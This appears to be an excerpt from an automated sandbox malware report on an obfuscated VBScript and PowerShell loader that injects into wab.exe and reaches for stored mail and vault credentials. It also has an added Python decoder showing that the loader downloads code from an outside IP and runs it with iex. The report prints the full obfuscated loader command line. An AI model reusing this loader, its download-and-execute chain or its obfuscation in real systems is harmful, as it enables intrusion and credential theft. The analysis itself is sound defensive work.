                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winmm.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rstrtmgr.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbT source: powershell.exe, 00000004.00000002.2235317847.0000000007B60000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: tem.Core.pdb4 source: powershell.exe, 00000004.00000002.2235317847.0000000007B60000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("powershell "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatal", "0")
Source: Yara match | File source: 00000004.00000002.2236560886.0000000009F6C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2236325736.0000000008060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2377560186.0000026CE6643000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2230426508.0000000005418000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($alfabetiseres)$global:Silversmiths = [System.Text.Encoding]::ASCII.GetString($Bvelserne)$global:Reststraffenes=$Silversmiths.substring($Bibliomanis,$Rehumanized)<#bnnemde Decoctions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Huldrekvinde $Kaosets189 $headwards), (Savendes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:kloreres = [AppDomain]::CurrentDomain.GetAssemblies()$globa
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Supraconduction)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Undladelsers, $false).DefineType($Kegleha
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($alfabetiseres)$global:Silversmiths = [System.Text.Encoding]::ASCII.GetString($Bvelserne)$global:Reststraffenes=$Silversmiths.substring($Bibliomanis,$Rehumanized)<#bnnemde Decoctions
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna
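The command line above carries its own string decoder: `Gunflints` takes every eighth character of a blob starting at offset 7 (one character per step because `$Sinologi` becomes 1 on any host whose `${host}.CurrentCulture` is set), and `Skildrerne` pipes the result into whatever `$Cumulates` decodes to. The Python below is an added example written for this report, not code from the sample or from Joe Sandbox; it ports that loop and runs it over the `Gunflints '...'` assignments copied verbatim from the recorded command line. The five blobs that survive intact on this page decode to a Firefox User-Agent value, the header name `User-Agent`, the download URL, a `>` redirect and `iex`. The `$Onklerne` blob (the `echo %appdata%...` command) is left out because, as rendered here, it no longer decodes to readable text; the stride depends on every character, including repeated spaces, surviving the page rendering.

```python
import re

# Port of the Gunflints decoder from the command line above. On a normal host
# ${host}.CurrentCulture is set, so $Sinologi is 1: one character is copied at
# offsets 7, 15, 23, ... and the loop stops before the last $Sinologi
# characters ($Guvnor = Length - 1), so the trailing pad byte is never emitted.
def gunflints(blob: str, width: int = 1, start: int = 7, stride: int = 8) -> str:
    end = len(blob) - width  # $Guvnor
    return "".join(blob[i:i + width] for i in range(start, end, stride))

# `$Name = Gunflints '<blob>'` assignments; none of the blobs contain a quote.
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*Gunflints\s*'([^']*)'")

def decode_assignments(script: str) -> dict:
    """Return {variable name: decoded string} for every Gunflints assignment."""
    return {name: gunflints(blob) for name, blob in ASSIGN_RE.findall(script)}

# Verbatim fragments of the PowerShell command line recorded in this report.
SCRIPT_FRAGMENT = (
    "$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';"
    "$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';"
    "$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';"
    "$Furibund=Gunflints 'Enkelth>Se.opus ';"
    "$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';"
)

if __name__ == "__main__":
    for name, value in decode_assignments(SCRIPT_FRAGMENT).items():
        print(f"${name:<12} -> {value!r}")
```

`$Cryptoglaux` and `$spliff` are the header value and name the loader sends when it fetches `$Parolees`, and `$Cumulates` decoding to `iex` is what turns `Skildrerne (Gunflints '...')` into arbitrary code execution. When decoding from a rendered report rather than from the captured script, check each output for a clean stride first (a URL or user agent that turns to noise part-way through means a character, usually a double space, was lost in rendering).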
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,10_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B955479 push ebp; iretd 1_2_00007FFD9B955538
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_02A5EC78 pushfd ; retf 4_2_02A5EC79
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06E40000 push es; retf 4_2_06E40014
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06E481A1 push esi; retf 4_2_06E481A2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06E41D28 push eax; mov dword ptr [esp], ecx4_2_06E421B4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A05E8C push ebp; retf 4_2_08A05E98
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A02030 push FFFFFFABh; iretd 4_2_08A02044
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A00D1E push cs; ret 4_2_08A00D21
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A05F4B push ss; retf 4_2_08A05F5B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A01B52 push esi; iretd 4_2_08A01B53
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08A06D58 push ebx; iretd 4_2_08A06D59
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_22792806 push ecx; ret 9_2_22792819
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_04462030 push FFFFFFABh; iretd 9_2_04462044
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_04466D58 push ebx; iretd 9_2_04466D59
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_04460D1E push cs; ret 9_2_04460D21
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_04465E8C push ebp; retf 9_2_04465E98
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_04465F4B push ss; retf 9_2_04465F5B
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_04461B52 push esi; iretd 9_2_04461B53
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0044693D push ecx; ret 10_2_0044694D
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0044DB70 push eax; ret 10_2_0044DB84
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0044DB70 push eax; ret 10_2_0044DBAC
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_00451D54 push eax; ret 10_2_00451D61
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044B090 push eax; ret 11_2_0044B0A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044B090 push eax; ret 11_2_0044B0CC
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00444E71 push ecx; ret 11_2_00444E81
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00414060 push eax; ret 12_2_00414074
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00414060 push eax; ret 12_2_0041409C
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00414039 push ecx; ret 12_2_00414049
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004164EB push 0000006Ah; retf 12_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00416553 push 0000006Ah; retf 12_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00416555 push 0000006Ah; retf 12_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_004047CB
                Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 600FA16
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5677Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4162Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6961Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2774Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5715Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3752Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 1772Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.3 %
                Source: C:\Windows\System32\wscript.exe TID: 4320Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7260Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7420Thread sleep count: 6961 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7424Thread sleep count: 2774 > 30Jump to behavior
